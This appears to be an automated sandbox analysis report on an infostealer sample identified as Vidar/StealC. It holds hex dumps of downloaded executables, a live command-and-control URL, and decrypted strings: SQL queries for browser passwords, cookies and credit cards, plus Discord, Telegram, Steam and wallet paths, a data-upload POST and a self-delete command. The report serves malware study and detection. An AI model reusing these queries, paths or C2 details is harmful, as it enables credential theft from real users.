Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:13 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:14 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: i3NmF0obCm.exe	Malware Configuration Extractor: Vidar {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}
Source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://40.86.87.10/108e010e8f91c38c.php"}

Source: i3NmF0obCm.exe	Virustotal: Detection: 58%			Perma Link
Source: i3NmF0obCm.exe	ReversingLabs: Detection: 71%

Source: i3NmF0obCm.exe	String decryptor: INSERT_KEY_HERE
Source: i3NmF0obCm.exe	String decryptor: GetProcAddress
Source: i3NmF0obCm.exe	String decryptor: LoadLibraryA
Source: i3NmF0obCm.exe	String decryptor: lstrcatA
Source: i3NmF0obCm.exe	String decryptor: OpenEventA
Source: i3NmF0obCm.exe	String decryptor: CreateEventA
Source: i3NmF0obCm.exe	String decryptor: CloseHandle
Source: i3NmF0obCm.exe	String decryptor: Sleep
Source: i3NmF0obCm.exe	String decryptor: GetUserDefaultLangID
Source: i3NmF0obCm.exe	String decryptor: VirtualAllocExNuma
Source: i3NmF0obCm.exe	String decryptor: VirtualFree
Source: i3NmF0obCm.exe	String decryptor: GetSystemInfo
Source: i3NmF0obCm.exe	String decryptor: VirtualAlloc
Source: i3NmF0obCm.exe	String decryptor: HeapAlloc
Source: i3NmF0obCm.exe	String decryptor: GetComputerNameA
Source: i3NmF0obCm.exe	String decryptor: lstrcpyA
Source: i3NmF0obCm.exe	String decryptor: GetProcessHeap
Source: i3NmF0obCm.exe	String decryptor: GetCurrentProcess
Source: i3NmF0obCm.exe	String decryptor: lstrlenA
Source: i3NmF0obCm.exe	String decryptor: ExitProcess
Source: i3NmF0obCm.exe	String decryptor: GlobalMemoryStatusEx
Source: i3NmF0obCm.exe	String decryptor: GetSystemTime
Source: i3NmF0obCm.exe	String decryptor: SystemTimeToFileTime
Source: i3NmF0obCm.exe	String decryptor: advapi32.dll
Source: i3NmF0obCm.exe	String decryptor: gdi32.dll
Source: i3NmF0obCm.exe	String decryptor: user32.dll
Source: i3NmF0obCm.exe	String decryptor: crypt32.dll
Source: i3NmF0obCm.exe	String decryptor: ntdll.dll
Source: i3NmF0obCm.exe	String decryptor: GetUserNameA
Source: i3NmF0obCm.exe	String decryptor: CreateDCA
Source: i3NmF0obCm.exe	String decryptor: GetDeviceCaps
Source: i3NmF0obCm.exe	String decryptor: ReleaseDC
Source: i3NmF0obCm.exe	String decryptor: CryptStringToBinaryA
Source: i3NmF0obCm.exe	String decryptor: sscanf
Source: i3NmF0obCm.exe	String decryptor: VMwareVMware
Source: i3NmF0obCm.exe	String decryptor: HAL9TH
Source: i3NmF0obCm.exe	String decryptor: JohnDoe
Source: i3NmF0obCm.exe	String decryptor: DISPLAY
Source: i3NmF0obCm.exe	String decryptor: %hu/%hu/%hu
Source: i3NmF0obCm.exe	String decryptor: http://40.86.87.10
Source: i3NmF0obCm.exe	String decryptor: /108e010e8f91c38c.php
Source: i3NmF0obCm.exe	String decryptor: /b13597c85f807692/
Source: i3NmF0obCm.exe	String decryptor: GetEnvironmentVariableA
Source: i3NmF0obCm.exe	String decryptor: GetFileAttributesA
Source: i3NmF0obCm.exe	String decryptor: GlobalLock
Source: i3NmF0obCm.exe	String decryptor: HeapFree
Source: i3NmF0obCm.exe	String decryptor: GetFileSize
Source: i3NmF0obCm.exe	String decryptor: GlobalSize
Source: i3NmF0obCm.exe	String decryptor: CreateToolhelp32Snapshot
Source: i3NmF0obCm.exe	String decryptor: IsWow64Process
Source: i3NmF0obCm.exe	String decryptor: Process32Next
Source: i3NmF0obCm.exe	String decryptor: GetLocalTime
Source: i3NmF0obCm.exe	String decryptor: FreeLibrary
Source: i3NmF0obCm.exe	String decryptor: GetTimeZoneInformation
Source: i3NmF0obCm.exe	String decryptor: GetSystemPowerStatus
Source: i3NmF0obCm.exe	String decryptor: GetVolumeInformationA
Source: i3NmF0obCm.exe	String decryptor: GetWindowsDirectoryA
Source: i3NmF0obCm.exe	String decryptor: Process32First
Source: i3NmF0obCm.exe	String decryptor: GetLocaleInfoA
Source: i3NmF0obCm.exe	String decryptor: GetUserDefaultLocaleName
Source: i3NmF0obCm.exe	String decryptor: GetModuleFileNameA
Source: i3NmF0obCm.exe	String decryptor: DeleteFileA
Source: i3NmF0obCm.exe	String decryptor: FindNextFileA
Source: i3NmF0obCm.exe	String decryptor: LocalFree
Source: i3NmF0obCm.exe	String decryptor: FindClose
Source: i3NmF0obCm.exe	String decryptor: SetEnvironmentVariableA
Source: i3NmF0obCm.exe	String decryptor: LocalAlloc
Source: i3NmF0obCm.exe	String decryptor: GetFileSizeEx
Source: i3NmF0obCm.exe	String decryptor: ReadFile
Source: i3NmF0obCm.exe	String decryptor: SetFilePointer
Source: i3NmF0obCm.exe	String decryptor: WriteFile
Source: i3NmF0obCm.exe	String decryptor: CreateFileA
Source: i3NmF0obCm.exe	String decryptor: FindFirstFileA
Source: i3NmF0obCm.exe	String decryptor: CopyFileA
Source: i3NmF0obCm.exe	String decryptor: VirtualProtect
Source: i3NmF0obCm.exe	String decryptor: GetLogicalProcessorInformationEx
Source: i3NmF0obCm.exe	String decryptor: GetLastError
Source: i3NmF0obCm.exe	String decryptor: lstrcpynA
Source: i3NmF0obCm.exe	String decryptor: MultiByteToWideChar
Source: i3NmF0obCm.exe	String decryptor: GlobalFree
Source: i3NmF0obCm.exe	String decryptor: WideCharToMultiByte
Source: i3NmF0obCm.exe	String decryptor: GlobalAlloc
Source: i3NmF0obCm.exe	String decryptor: OpenProcess
Source: i3NmF0obCm.exe	String decryptor: TerminateProcess
Source: i3NmF0obCm.exe	String decryptor: GetCurrentProcessId
Source: i3NmF0obCm.exe	String decryptor: gdiplus.dll
Source: i3NmF0obCm.exe	String decryptor: ole32.dll
Source: i3NmF0obCm.exe	String decryptor: bcrypt.dll
Source: i3NmF0obCm.exe	String decryptor: wininet.dll
Source: i3NmF0obCm.exe	String decryptor: shlwapi.dll
Source: i3NmF0obCm.exe	String decryptor: shell32.dll
Source: i3NmF0obCm.exe	String decryptor: psapi.dll
Source: i3NmF0obCm.exe	String decryptor: rstrtmgr.dll
Source: i3NmF0obCm.exe	String decryptor: CreateCompatibleBitmap
Source: i3NmF0obCm.exe	String decryptor: SelectObject
Source: i3NmF0obCm.exe	String decryptor: BitBlt
Source: i3NmF0obCm.exe	String decryptor: DeleteObject
Source: i3NmF0obCm.exe	String decryptor: CreateCompatibleDC
Source: i3NmF0obCm.exe	String decryptor: GdipGetImageEncodersSize
Source: i3NmF0obCm.exe	String decryptor: GdipGetImageEncoders
Source: i3NmF0obCm.exe	String decryptor: GdipCreateBitmapFromHBITMAP
Source: i3NmF0obCm.exe	String decryptor: GdiplusStartup
Source: i3NmF0obCm.exe	String decryptor: GdiplusShutdown
Source: i3NmF0obCm.exe	String decryptor: GdipSaveImageToStream
Source: i3NmF0obCm.exe	String decryptor: GdipDisposeImage
Source: i3NmF0obCm.exe	String decryptor: GdipFree
Source: i3NmF0obCm.exe	String decryptor: GetHGlobalFromStream
Source: i3NmF0obCm.exe	String decryptor: CreateStreamOnHGlobal
Source: i3NmF0obCm.exe	String decryptor: CoUninitialize
Source: i3NmF0obCm.exe	String decryptor: CoInitialize
Source: i3NmF0obCm.exe	String decryptor: CoCreateInstance
Source: i3NmF0obCm.exe	String decryptor: BCryptGenerateSymmetricKey
Source: i3NmF0obCm.exe	String decryptor: BCryptCloseAlgorithmProvider
Source: i3NmF0obCm.exe	String decryptor: BCryptDecrypt
Source: i3NmF0obCm.exe	String decryptor: BCryptSetProperty
Source: i3NmF0obCm.exe	String decryptor: BCryptDestroyKey
Source: i3NmF0obCm.exe	String decryptor: BCryptOpenAlgorithmProvider
Source: i3NmF0obCm.exe	String decryptor: GetWindowRect
Source: i3NmF0obCm.exe	String decryptor: GetDesktopWindow
Source: i3NmF0obCm.exe	String decryptor: GetDC
Source: i3NmF0obCm.exe	String decryptor: CloseWindow
Source: i3NmF0obCm.exe	String decryptor: wsprintfA
Source: i3NmF0obCm.exe	String decryptor: EnumDisplayDevicesA
Source: i3NmF0obCm.exe	String decryptor: GetKeyboardLayoutList
Source: i3NmF0obCm.exe	String decryptor: CharToOemW
Source: i3NmF0obCm.exe	String decryptor: wsprintfW
Source: i3NmF0obCm.exe	String decryptor: RegQueryValueExA
Source: i3NmF0obCm.exe	String decryptor: RegEnumKeyExA
Source: i3NmF0obCm.exe	String decryptor: RegOpenKeyExA
Source: i3NmF0obCm.exe	String decryptor: RegCloseKey
Source: i3NmF0obCm.exe	String decryptor: RegEnumValueA
Source: i3NmF0obCm.exe	String decryptor: CryptBinaryToStringA
Source: i3NmF0obCm.exe	String decryptor: CryptUnprotectData
Source: i3NmF0obCm.exe	String decryptor: SHGetFolderPathA
Source: i3NmF0obCm.exe	String decryptor: ShellExecuteExA
Source: i3NmF0obCm.exe	String decryptor: InternetOpenUrlA
Source: i3NmF0obCm.exe	String decryptor: InternetConnectA
Source: i3NmF0obCm.exe	String decryptor: InternetCloseHandle
Source: i3NmF0obCm.exe	String decryptor: InternetOpenA
Source: i3NmF0obCm.exe	String decryptor: HttpSendRequestA
Source: i3NmF0obCm.exe	String decryptor: HttpOpenRequestA
Source: i3NmF0obCm.exe	String decryptor: InternetReadFile
Source: i3NmF0obCm.exe	String decryptor: InternetCrackUrlA
Source: i3NmF0obCm.exe	String decryptor: StrCmpCA
Source: i3NmF0obCm.exe	String decryptor: StrStrA
Source: i3NmF0obCm.exe	String decryptor: StrCmpCW
Source: i3NmF0obCm.exe	String decryptor: PathMatchSpecA
Source: i3NmF0obCm.exe	String decryptor: GetModuleFileNameExA
Source: i3NmF0obCm.exe	String decryptor: RmStartSession
Source: i3NmF0obCm.exe	String decryptor: RmRegisterResources
Source: i3NmF0obCm.exe	String decryptor: RmGetList
Source: i3NmF0obCm.exe	String decryptor: RmEndSession
Source: i3NmF0obCm.exe	String decryptor: sqlite3_open
Source: i3NmF0obCm.exe	String decryptor: sqlite3_prepare_v2
Source: i3NmF0obCm.exe	String decryptor: sqlite3_step
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_text
Source: i3NmF0obCm.exe	String decryptor: sqlite3_finalize
Source: i3NmF0obCm.exe	String decryptor: sqlite3_close
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_bytes
Source: i3NmF0obCm.exe	String decryptor: sqlite3_column_blob
Source: i3NmF0obCm.exe	String decryptor: encrypted_key
Source: i3NmF0obCm.exe	String decryptor: PATH
Source: i3NmF0obCm.exe	String decryptor: C:\ProgramData\nss3.dll
Source: i3NmF0obCm.exe	String decryptor: NSS_Init
Source: i3NmF0obCm.exe	String decryptor: NSS_Shutdown
Source: i3NmF0obCm.exe	String decryptor: PK11_GetInternalKeySlot
Source: i3NmF0obCm.exe	String decryptor: PK11_FreeSlot
Source: i3NmF0obCm.exe	String decryptor: PK11_Authenticate
Source: i3NmF0obCm.exe	String decryptor: PK11SDR_Decrypt
Source: i3NmF0obCm.exe	String decryptor: C:\ProgramData\
Source: i3NmF0obCm.exe	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: i3NmF0obCm.exe	String decryptor: browser:
Source: i3NmF0obCm.exe	String decryptor: profile:
Source: i3NmF0obCm.exe	String decryptor: url:
Source: i3NmF0obCm.exe	String decryptor: login:
Source: i3NmF0obCm.exe	String decryptor: password:
Source: i3NmF0obCm.exe	String decryptor: Opera
Source: i3NmF0obCm.exe	String decryptor: OperaGX
Source: i3NmF0obCm.exe	String decryptor: Network
Source: i3NmF0obCm.exe	String decryptor: cookies
Source: i3NmF0obCm.exe	String decryptor: .txt
Source: i3NmF0obCm.exe	String decryptor: TRUE
Source: i3NmF0obCm.exe	String decryptor: FALSE
Source: i3NmF0obCm.exe	String decryptor: autofill
Source: i3NmF0obCm.exe	String decryptor: SELECT name, value FROM autofill
Source: i3NmF0obCm.exe	String decryptor: history
Source: i3NmF0obCm.exe	String decryptor: SELECT url FROM urls LIMIT 1000
Source: i3NmF0obCm.exe	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: i3NmF0obCm.exe	String decryptor: name:
Source: i3NmF0obCm.exe	String decryptor: month:
Source: i3NmF0obCm.exe	String decryptor: year:
Source: i3NmF0obCm.exe	String decryptor: card:
Source: i3NmF0obCm.exe	String decryptor: Cookies
Source: i3NmF0obCm.exe	String decryptor: Login Data
Source: i3NmF0obCm.exe	String decryptor: Web Data
Source: i3NmF0obCm.exe	String decryptor: History
Source: i3NmF0obCm.exe	String decryptor: logins.json
Source: i3NmF0obCm.exe	String decryptor: formSubmitURL
Source: i3NmF0obCm.exe	String decryptor: usernameField
Source: i3NmF0obCm.exe	String decryptor: encryptedUsername
Source: i3NmF0obCm.exe	String decryptor: encryptedPassword
Source: i3NmF0obCm.exe	String decryptor: guid
Source: i3NmF0obCm.exe	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: i3NmF0obCm.exe	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: i3NmF0obCm.exe	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: i3NmF0obCm.exe	String decryptor: cookies.sqlite
Source: i3NmF0obCm.exe	String decryptor: formhistory.sqlite
Source: i3NmF0obCm.exe	String decryptor: places.sqlite
Source: i3NmF0obCm.exe	String decryptor: plugins
Source: i3NmF0obCm.exe	String decryptor: Local Extension Settings
Source: i3NmF0obCm.exe	String decryptor: Sync Extension Settings
Source: i3NmF0obCm.exe	String decryptor: IndexedDB
Source: i3NmF0obCm.exe	String decryptor: Opera Stable
Source: i3NmF0obCm.exe	String decryptor: Opera GX Stable
Source: i3NmF0obCm.exe	String decryptor: CURRENT
Source: i3NmF0obCm.exe	String decryptor: chrome-extension_
Source: i3NmF0obCm.exe	String decryptor: _0.indexeddb.leveldb
Source: i3NmF0obCm.exe	String decryptor: Local State
Source: i3NmF0obCm.exe	String decryptor: profiles.ini
Source: i3NmF0obCm.exe	String decryptor: chrome
Source: i3NmF0obCm.exe	String decryptor: opera
Source: i3NmF0obCm.exe	String decryptor: firefox
Source: i3NmF0obCm.exe	String decryptor: wallets
Source: i3NmF0obCm.exe	String decryptor: %08lX%04lX%lu
Source: i3NmF0obCm.exe	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: i3NmF0obCm.exe	String decryptor: ProductName
Source: i3NmF0obCm.exe	String decryptor: %d/%d/%d %d:%d:%d
Source: i3NmF0obCm.exe	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: i3NmF0obCm.exe	String decryptor: ProcessorNameString
Source: i3NmF0obCm.exe	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: i3NmF0obCm.exe	String decryptor: DisplayName
Source: i3NmF0obCm.exe	String decryptor: DisplayVersion
Source: i3NmF0obCm.exe	String decryptor: Network Info:
Source: i3NmF0obCm.exe	String decryptor: - IP: IP?
Source: i3NmF0obCm.exe	String decryptor: - Country: ISO?
Source: i3NmF0obCm.exe	String decryptor: System Summary:
Source: i3NmF0obCm.exe	String decryptor: - HWID:
Source: i3NmF0obCm.exe	String decryptor: - OS:
Source: i3NmF0obCm.exe	String decryptor: - Architecture:
Source: i3NmF0obCm.exe	String decryptor: - UserName:
Source: i3NmF0obCm.exe	String decryptor: - Computer Name:
Source: i3NmF0obCm.exe	String decryptor: - Local Time:
Source: i3NmF0obCm.exe	String decryptor: - UTC:
Source: i3NmF0obCm.exe	String decryptor: - Language:
Source: i3NmF0obCm.exe	String decryptor: - Keyboards:
Source: i3NmF0obCm.exe	String decryptor: - Laptop:
Source: i3NmF0obCm.exe	String decryptor: - Running Path:
Source: i3NmF0obCm.exe	String decryptor: - CPU:
Source: i3NmF0obCm.exe	String decryptor: - Threads:
Source: i3NmF0obCm.exe	String decryptor: - Cores:
Source: i3NmF0obCm.exe	String decryptor: - RAM:
Source: i3NmF0obCm.exe	String decryptor: - Display Resolution:
Source: i3NmF0obCm.exe	String decryptor: - GPU:
Source: i3NmF0obCm.exe	String decryptor: User Agents:
Source: i3NmF0obCm.exe	String decryptor: Installed Apps:
Source: i3NmF0obCm.exe	String decryptor: All Users:
Source: i3NmF0obCm.exe	String decryptor: Current User:
Source: i3NmF0obCm.exe	String decryptor: Process List:
Source: i3NmF0obCm.exe	String decryptor: system_info.txt
Source: i3NmF0obCm.exe	String decryptor: freebl3.dll
Source: i3NmF0obCm.exe	String decryptor: mozglue.dll
Source: i3NmF0obCm.exe	String decryptor: msvcp140.dll
Source: i3NmF0obCm.exe	String decryptor: nss3.dll
Source: i3NmF0obCm.exe	String decryptor: softokn3.dll
Source: i3NmF0obCm.exe	String decryptor: vcruntime140.dll
Source: i3NmF0obCm.exe	String decryptor: \Temp\
Source: i3NmF0obCm.exe	String decryptor: .exe
Source: i3NmF0obCm.exe	String decryptor: runas
Source: i3NmF0obCm.exe	String decryptor: open
Source: i3NmF0obCm.exe	String decryptor: /c start
Source: i3NmF0obCm.exe	String decryptor: %DESKTOP%
Source: i3NmF0obCm.exe	String decryptor: %APPDATA%
Source: i3NmF0obCm.exe	String decryptor: %LOCALAPPDATA%
Source: i3NmF0obCm.exe	String decryptor: %USERPROFILE%
Source: i3NmF0obCm.exe	String decryptor: %DOCUMENTS%
Source: i3NmF0obCm.exe	String decryptor: %PROGRAMFILES%
Source: i3NmF0obCm.exe	String decryptor: %PROGRAMFILES_86%
Source: i3NmF0obCm.exe	String decryptor: %RECENT%
Source: i3NmF0obCm.exe	String decryptor: *.lnk
Source: i3NmF0obCm.exe	String decryptor: files
Source: i3NmF0obCm.exe	String decryptor: \discord\
Source: i3NmF0obCm.exe	String decryptor: \Local Storage\leveldb\CURRENT
Source: i3NmF0obCm.exe	String decryptor: \Local Storage\leveldb
Source: i3NmF0obCm.exe	String decryptor: \Telegram Desktop\
Source: i3NmF0obCm.exe	String decryptor: key_datas
Source: i3NmF0obCm.exe	String decryptor: D877F783D5D3EF8C*
Source: i3NmF0obCm.exe	String decryptor: map*
Source: i3NmF0obCm.exe	String decryptor: A7FDF864FBC10B77*
Source: i3NmF0obCm.exe	String decryptor: A92DAA6EA6F891F2*
Source: i3NmF0obCm.exe	String decryptor: F8806DD0C461824F*
Source: i3NmF0obCm.exe	String decryptor: Telegram
Source: i3NmF0obCm.exe	String decryptor: *.tox
Source: i3NmF0obCm.exe	String decryptor: *.ini
Source: i3NmF0obCm.exe	String decryptor: Password
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: i3NmF0obCm.exe	String decryptor: 00000001
Source: i3NmF0obCm.exe	String decryptor: 00000002
Source: i3NmF0obCm.exe	String decryptor: 00000003
Source: i3NmF0obCm.exe	String decryptor: 00000004
Source: i3NmF0obCm.exe	String decryptor: \Outlook\accounts.txt
Source: i3NmF0obCm.exe	String decryptor: Pidgin
Source: i3NmF0obCm.exe	String decryptor: \.purple\
Source: i3NmF0obCm.exe	String decryptor: accounts.xml
Source: i3NmF0obCm.exe	String decryptor: dQw4w9WgXcQ
Source: i3NmF0obCm.exe	String decryptor: token:
Source: i3NmF0obCm.exe	String decryptor: Software\Valve\Steam
Source: i3NmF0obCm.exe	String decryptor: SteamPath
Source: i3NmF0obCm.exe	String decryptor: \config\
Source: i3NmF0obCm.exe	String decryptor: ssfn*
Source: i3NmF0obCm.exe	String decryptor: config.vdf
Source: i3NmF0obCm.exe	String decryptor: DialogConfig.vdf
Source: i3NmF0obCm.exe	String decryptor: DialogConfigOverlay*.vdf
Source: i3NmF0obCm.exe	String decryptor: libraryfolders.vdf
Source: i3NmF0obCm.exe	String decryptor: loginusers.vdf
Source: i3NmF0obCm.exe	String decryptor: \Steam\
Source: i3NmF0obCm.exe	String decryptor: sqlite3.dll
Source: i3NmF0obCm.exe	String decryptor: browsers
Source: i3NmF0obCm.exe	String decryptor: done
Source: i3NmF0obCm.exe	String decryptor: soft
Source: i3NmF0obCm.exe	String decryptor: \Discord\tokens.txt
Source: i3NmF0obCm.exe	String decryptor: /c timeout /t 5 & del /f /q "
Source: i3NmF0obCm.exe	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: i3NmF0obCm.exe	String decryptor: C:\Windows\system32\cmd.exe
Source: i3NmF0obCm.exe	String decryptor: https
Source: i3NmF0obCm.exe	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: i3NmF0obCm.exe	String decryptor: POST
Source: i3NmF0obCm.exe	String decryptor: HTTP/1.1
Source: i3NmF0obCm.exe	String decryptor: Content-Disposition: form-data; name="
Source: i3NmF0obCm.exe	String decryptor: hwid
Source: i3NmF0obCm.exe	String decryptor: build
Source: i3NmF0obCm.exe	String decryptor: token
Source: i3NmF0obCm.exe	String decryptor: file_name
Source: i3NmF0obCm.exe	String decryptor: file
